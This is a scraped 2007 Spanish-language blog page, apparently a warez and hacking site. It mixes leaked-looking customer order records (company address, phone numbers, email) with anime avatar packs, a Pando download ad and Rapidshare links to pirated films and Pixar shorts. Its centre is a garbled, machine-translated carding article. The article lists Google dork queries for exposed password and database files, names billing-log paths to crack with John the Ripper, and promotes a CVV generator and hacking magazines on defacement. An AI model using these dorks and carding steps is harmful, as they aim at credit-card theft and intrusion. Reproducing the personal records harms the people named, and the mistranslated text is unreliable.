CUSTOMER NUMBER: 45367000 |1|0.00|Frigidaire|44.84|WCO-216522312|60.59|44.84|101|44.84|93.59| 9.36|0.00| 102.95 1094562550|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|KENDRO LABORATORY PRODUC|275 AIKEN ROAD|ASHEVILLE|NC|28804|US|8286584493|8286453981|amy.gahagan@kendro.spx.com|ACCOUNT|||/|UPS Ground|
PURCHASE ORDER NUMBER: 401906
CUSTOMER NUMBER: 45367000 |1|0.00|General Electric|44.55|GEO-WR24X5258|65.34|44.55|103|44.55|93.59| 9.36|0.00| 102.95

esto Fui yo que la saque de la web. http://www.cashwells.com

viernes, 28 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

238anime,manga Display

Les traigo el segundo paquete de Avatares, esta vez únicamente de Anime / Manga. En esta ocasion hay una amplia variedad de series, entre las cuales podrán encontrar:

  • ¡Ah, mi Diosa!
  • Angel Sanctuary Ah Megami Sama
  • Berserk
  • Bleach
  • Chobits
  • Death Note
  • DiGi Charat
  • DNAngel
  • Dot Hack
  • Elfen Lied Chobits
  • Evangelion
  • Fruits Basket
  • Full Metal Panic
  • Fullmetal Alchemist
  • Hellsing
  • InuYasha
  • Loveless
  • Nana
  • Naruto Bleach
  • One Piece
  • Ouran Host Club
  • Pita Ten
  • Rurouni Kenshin
  • Saiyuki
  • Samurai Champloo
  • Slam Dunk
  • Tenjou Tenge Hellsing
  • Tsubasa / XXXHolic
  • Tsukihime

Espero que disfruten este paquete, solo pesa 1,250kbs, el archivo esta en formato ZIP, aquí les dejo el link de Descarga:

Paquete de 238 Anime Avatares

jueves, 27 de septiembre de 2007 | Tags: | 5 comentario [ Mas... ]

Pando

Si quieres compartir con cualquier contacto un archivo de tamaño elevado como una película, un concierto o un proyecto cargado de documentos, esta aplicación te resultará muy útil.

Pando es una sencilla aplicación con la que podrás enviar o recibir ficheros o carpetas de una forma bastante curiosa.

Para poder comenzar a usar el programa, necesitarás registrarte previamente desde la ventana principal de Pando. Una vez dispongas de tu registro sólo tienes que insertar los paquetes y enviar un correo a la dirección a la que quieres enviar el archivo.

Para que la otra persona pueda descargarse estos ficheros necesitará tener instalado también el programa, ya que los archivos llegan como adjuntos con la extensión .pando.

Download Pando

Pando is free personal p2p software that lets you easily download and share HD media and other large files via email, IM and the Web.

Download Pando

Windows logo

Windows Vista, XP, 2000 (SP4)

1.8.0.4 (What's New)
Mac logo

Mac OS X 10.3.9 or later

1.8.0.4 (What's New)
Send me Pando's Special Delivery monthly email


Pando is only 3MB and takes seconds to install!
Requires: 256MB RAM, Broadband Internet connection


Pando is 100% clean of spyware, adware and viruses. And yes, its free. Enjoy it, and if you run into problems, drop us a quick note directly from Pando by clicking the "feedback" link.

Have more questions before installing? Click here.

Softpedia clean aware - no spyware, no adware, no malware

o si no visite http://www.pando.com/download

unreal1



Título: Unreal I
Año: 1998
Género: Arcade en primera persona
Desarrollador: Epic Games y Digital Extremes
Lengua: Inglés (al castellano con aplicación de parche)



Requísitos mínimos:

  • Sistema operativo: Windows 95, 98, Me, 2000, XP (funcionalidad en Vista no probada)
  • Velocidad de procesador: MMX 166 Megahercios
  • Memoria RAM: 64 Megabytes
  • Tarjeta gráfica: Compatible con DirectX 5 o OpenGL
  • Tarjeta de sonido: Compatible con DirectX 5 o OpenAL
  • Otros: Teclado, monitor y ratón



Destaca por la gran maleabilidad de su motor, como sabreis los jugadores de posteriores juegos de esta saga. Os animo a que os mireis mapas diseñados para esta plataforma y que juguéis online para disfrutarlo al máximo.



Imagen CD del juego:


Parche 226f

La tarjeta del cc Unsecure despliega

La tarjeta del cc Unsecure despliega

Viajan y cambiando en la red, los compradores y los tryers alrededor del sitio de amazon, ebay… algunos Web site carding. Unknow las ventajas de las transacciones seguras del cc. ¿Por qué?

Porque la confianza completa de la toma de los usuarios para CCBilling tramita normalmente, por ejemplo.

¿Éste es los “parecer” ficheros de diario de CCBilling (porqué este sistema excepto el tramitar en este registro simple? ¿porque los reveladores se cansaron? ¿esta sección ha programado para un newbie? tan…) en “asegurar el servidor” en un Web site:

Agregar-anterior: 33iga8EscoU9A|former: 1014413660: 20010608: 20010709: El repetirse
Agregar-richard: 13BZdrWqfpr6s|richard: 1014446426: 2001060920010908: El repetirse

donde:

Cliente de Firts: anterior

Segundo cliente: richard

Tomar una mirada rápida en el sitio cruzado de amazon que veo directorios de esta configuración:

“Índice de /admin”
“Índice de /password”
“Índice de /mail”
“De/” del índice +passwd
“De/” del índice +password.txt
“De/” del índice +.htaccess
índice del allinurl del ftp +.mdb: /cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype: tela de los config
índice de gobal.asax

allintitle: “índice of/admin”
allintitle: “índice of/root”
allintitle: filetype sensible: doc.
allintitle: filetype restricto: correo
allintitle: filetype restricto: sitio del doc.: gobierno

filetype del inurlasswd: txt
inurl: filetype del admin: DB
inurl: iisadmin
inurl: “auth_user_file.txt”
inurl: “wwwroot/*.”

¡Verás, esta exploración revelated el directorio del apilado, archivos para descargar y para leer para remoting fácil, “/robots.txt” es el archivo del motor de la búsqueda del controlador paso a paso y easly revelated la estructura entera del Web site, ésta es tan malo! , tan pobre. ¡En el primer paso de la grieta, este error es mortal! y la grieta es demasiado fácil…

¿Una exploración simple de la araña abre la estructura easly? , sí.

¿Cómo nosotros puede la búsqueda en el Web site para los ficheros de diario del unsecure del cc assumpting el sitio utilizar el sistema de CCBilling?

El registro simple revelated llamado:

http://www.amazon.com/customers/ccbill/secure/ccbill.log

Éste es el fichero de diario a agrietarse, con el jhon el destripador o la herramienta de descifre md4 (disponible en la sección de la transferencia directa).

Otros cc tramitan los Web site que trabajan con otros sistemas del cc, mmm como shop.pl/page=shop.cfg. Eso contiene un sistema del configuración para el cc tramita.

¿Nos agrietamos? sí, es muy simple y este sistema es inseguro para las miradas del DB, la base de datos funciona encendido la plataforma de Microsoft Acces (muy extraño él él) y el nombre de esto es shopping.mdb

Existe mucho el número para los sistemas, el unsecure y los pobres de CCBilling como un shopper.cgi y muchos otros los sistemas de facturación del cc del unsecure…

Nuestro amigo “goolge” del hacker puede explorar para este los sistemas para nosotros:) intentar explorar con el google esta línea:

¿“/cgi-bin/loadpage.cgi? user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log”

¿Ahora, la generación siguiente y entera para CCBilling ahora está, pero con el viejo sistema del desplome para los registros, también los https o SSH que el alocate localiza para la transacción del cc para no representar para la seguridad en nosotros transacciones del cc, por qué?

Una hazaña alejada en SSH que permite que el atacante personifique a cualquier usuario podría permitir a un gusano separarse al sistema de todos los anfitriones accesibles que funcionaban los servidores vulnerables de SSH (en el nivel 7 para la OSI). Tal gusano podría separarse unencumbered por retrasa incurrido en por los ataques que esperan la interacción del usuario, busca para credenciales, o funciona en varias ocasiones protocolos de la autentificación. La velocidad y el stealth de tal gusano serían limitados por su capacidad de identificar y de entrar en contacto con correctamente otros anfitriones vulnerables.

Porque en este “asegurar los servidores”, podemos explorar el servidor entero de la cogida cruzada con las herramientas de una exploración del saber como un Web spider de la herramienta o del joc del atk, con algunas líneas modificaciones en los códigos de fuente (disponibles en la sección de la transferencia directa). Para emular las credenciales de un SSH para un solicitante portuario descifrado. (o viejas metodologías spoofing: <)

Existe un cierto appz que toma el trabajo para ti, cc2bank app por ejemplo, éste genera un cv2 y los códigos cv1 dependen para el tipo cruzado de la tarjeta. ¡Esto está debajo de los tomadores de la facturación del cc del “viejo estilo”, pero desafortunadamente este viejo y unsecure cc tramitan sistemas existen y todavía utilizaron hoy!!!

Está hasta ti, cuando decides que la compra debajo del “asegura” el sitio de las compras de la tela. Las galletas todavía que toman y que descifran millares de cc y no paran mientras que los reveladores de la “seguridad” hacen diseños pobres y esquemas seguros pobres.

Cuando las empresas del software y de la seguridad decidirán a la toma las galletas para diseñar sistemas de la seguridad verdadera, el fraude del cc paró finalmente. Este día es un día lejano

dESCARGEN AQUI : PARA APRENDER http://www.crackenfind.net/magazine/crackenfind/crackenfind04.rar

Liberada CRACKENFIND III


Importante revista de seguridad informatica, que ha lanzado su numero III desde el inicio de su publicación en Agosto de "06. En este nuevo numero , se tratan diversos temas, desde la intrusión y deface a la nasa, hasta metodos de propagación por redes per to per (p2p).
Indice

- 2000 Architecture of FPGAs and CPLDs A Tutorial.pdf
- 2002 SURVEY Compton_ReconfigSurvey.pdf
- Acediendo Como R00t y Haciendo mass defacement.pdf
- Anti-Virus Software Gone Wrong.pdf
- antilamer emails.pdf
- Black Ops of TCP2005_Japan.pdf
- buffer overflow.pdf
- Buscando huecos y creando exploit.pdf
- Compilar Exploit con Cygwin by OzX.pdf
- CódigoCVV2.pdf
- defacing.pdf
- Effective Bug Discovery.pdf
- Encrypted Root File System.pdf
- Evading NIDS.pdf
- Fingerprinting 802.11 Implementations.pdf
- Grepping Executive Objects from Pool Memory.pdf
- Hackeo a la NASA.pdf
- How does an attacker evade IDS with Session Splicing.pd
- Implementing a Custom X86 Encoder.pdf
- Improving Automated Analysis of Windows x64 Binaries.pd
- Introducción Al Hackin by ozx.pdf
- manualEthereal.pdf
- Obtener Ip vía MSN.pdf
- Obteniendo Terminal Server.pdf
- Preventing the Exploitation of SEH Overwrites.pdf
- PropagacionefectivaporP2P.pdf
- Slackware WPA Wireless.pdf


Descarga: http://www.crackenfind.net/magazine/crackenfind/crackenfind03.rar
Web oficial : www.crackenfind.net


MIREN PRIMERO ESTAS EL
LIBRO NUMERO 1 http://www.crackenfind.net/magazine/crackenfind/crackenfind01.rar

LIBRO NUMERO 2 http://www.crackenfind.net/magazine/crackenfind/crackenfind02.rar

LIBRO NUMERO 3 http://www.crackenfind.net/magazine/crackenfind/crackenfind03.rar

LIBRO NUMERO 4 http://www.crackenfind.net/magazine/crackenfind/crackenfind04.rar


Resident Evil 3: Extinction



Dados do Filme

Título Original: Resident Evil 3: Extinction
Título Traduzido: Resident Evil 3: A Extinção
Gênero: Terror
Duração: 85 Minutos
Ano de Lançamento: 2007
Direção: Russell Mulcahy

Informações
Tamanho: 700 MB
Resolução: 608 x 256
Frame Rate: 25.000 fps
Formato: AVI
Qualidade de Áudio: 8
Qualidade de Vídeo: 8
Vídeo Codec: XviD MPEG-4
Áudio Codec: AC3/DTS Codec
Idioma: Russo
Legenda:Ainda não saiu

Clique aqui para mais informações do filme Resident Evil 3: Extinction




Parte 1
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7

miércoles, 26 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

Dragon Wars (2007) CAM.xvid



A beautiful young woman possesses the power to transform a legendary giant serpent into an almighty dragon who can only ascend into heaven with the woman's ultimate sacrifice. But the forces of darkness are out to claim the young woman as their own and her reincarnated lover and his aged mentor stand in their way.

Genres: Action/Adventure, Art/Foreign, Drama and Science Fiction/Fantasy
Running Time: 1 hr. 22 min.
Release Date: September 14th, 2007 (wide)
MPAA Rating: PG-13 for intense sequences of violence and creature action.
FRAMeRATe: 23.976fps
Bitrate: 156kbps
Dimensions: 592 x 320
Size: 698MB

Caps:


Code:
Download:
http://rapidshare.com/files/57615541/DW_-_MaxGrab.part1.rar
http://rapidshare.com/files/57621352/DW_-_MaxGrab.part2.rar
http://rapidshare.com/files/57620651/DW_-_MaxGrab.part3.rar
http://rapidshare.com/files/57619613/DW_-_MaxGrab.part4.rar
http://rapidshare.com/files/57618574/DW_-_MaxGrab.part5.rar
http://rapidshare.com/files/57617532/DW_-_MaxGrab.part6.rar
http://rapidshare.com/files/57616784/DW_-_MaxGrab.part7.rar
http://rapidshare.com/files/57615771/DW_-_MaxGrab.part8.rar

Password:
www.maxgrab.org

E-Book Windows Vista Secrets


Contents:
Part I: Surviving Setup
Chapter 1: Selecting the Right Vista Version
Chapter 2: Installing and Upgrading to Windows Vista
Chapter 3: Vista Compatibility

Part II: Understanding the Windows Vista User Experience
Chapter 4: What’s New in the Windows Vista User Interface
Chapter 5: Where’s My Stuff? Finding and Organizing Files Chapter 6: Using Windows Sidebar
Chapter 7: Fonts

Part III: Security
Chapter 8: Windows Vista Security Features
Chapter 9: New User Account Features

Part IV: Digital Media and Entertainment
Chapter 10: Windows Media Player
Chapter 11: Enjoying Digital Photos
Chapter 12: Making Movies and DVD Movies
Chapter 13: Digital Media in the Living Room: Windows Media Center
Chapter 14: Having Fun: Games and Vista

Part V: Mobility
Chapter 15: Computing to Go: Windows Vista Mobility Features
Chapter 16: New Tablet PC Features

Part VI: Internet and Networking
Chapter 17: Browsing the Web with Internet Explorer 7
Chapter 18: Windows Mail and Contacts
Chapter 19: Using and Understanding Windows Live Services

Part VII: Home Office/Power User
Chapter 20: Managing Your Schedule with Windows Calendar
Chapter 21: Keeping Your Data Safe
Chapter 22: Microsoft PowerShell

download

Amine

A Bugs Life - Outtakes


Code:
http://rapidshare.com/files/37907688/Pixar-A_Bug_s_Life_outtakes.rar
Adventures of Andre and Wally B


Code:
http://rapidshare.com/files/37907689/Pixar-Adventures_of_Andre_and_Wally_B.rar
Bruce Lee


Code:
http://rapidshare.com/files/37907690/Pixar-Bruce_Lee.rar
Bunny


Code:
http://rapidshare.com/files/37907691/Pixar-Bunny.rar
Half Gray


Code:
http://rapidshare.com/files/37907692/Pixar-Half_Gray.rar
Ice Egg


Code:
http://rapidshare.com/files/37907693/Pixar-Ice_Egg.rar
Jungle


Code:
http://rapidshare.com/files/37907694/Pixar-Jungle.rar
Luxo


Code:
http://rapidshare.com/files/37907695/Pixar-Luxo.rar
Mouse Final


Code:
http://rapidshare.com/files/37907696/Pixar-Mouse_Final.rar
Something Fishy


Code:
http://rapidshare.com/files/37907697/Pixar-Something_Fishy.rar
Pings


Code:
http://rapidshare.com/files/37913045/Pixar-Pings.rar
Mikes New Car


Code:
http://rapidshare.com/files/37923069/Pixar-Mike_s_New_Car.rar
Shrek Extra


Code:
http://rapidshare.com/files/37923070/Pixar-Shrek_Extra.rar
Boundin


Code:
http://rapidshare.com/files/37955251/Pixar-Boundin.rar
The Cookie Singer


Code:
http://rapidshare.com/files/37955254/Pixar-Cookies_Singer.rar
Duality


Code:
http://rapidshare.com/files/37955256/Pixar-Duality.rar
Gobola, The great magician


Code:
http://rapidshare.com/files/37955258/Pixar-Gabola__the_great_magician.rar
Geris Game (Oscar Winner!!)


Code:
http://rapidshare.com/files/37971278/Pixar-Geris_Game.rar
Locomotion


Code:
http://rapidshare.com/files/37971280/Pixar-Locomotion.rar
Toy Story Bloopers


Code:
http://rapidshare.com/files/37971281/Pixar-Toy_Story_Bloopers.rar
Gasplanet


Code:
http://rapidshare.com/files/37981701/Pixar-Gasplanet.rar
Reds Dream


Code:
http://rapidshare.com/files/37981703/Pixar-Red_s_Dream.rar
Knick Knack


Code:
http://rapidshare.com/files/37988556/Pixar-Knick_Knack.rar
The Chubbchubbs


Code:
http://rapidshare.com/files/38066994/Pixar-The_Chubbchubbs.rar
For the birds


Code:
http://rapidshare.com/files/38073663/Pixar-For_the_Birds.rar
Jack Jack Attack


Code:
http://rapidshare.com/files/38084338/Pixar-Jack-Jack_Attack.rar
One Man Band


File:
Code:
http://rapidshare.com/files/40262201/one_man_band.rar
Lifted 2007


Code:
http://rapidshare.com/files/45503250/pixar-lifted.rar
Enjoy! :)

Pass to them ALL:

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter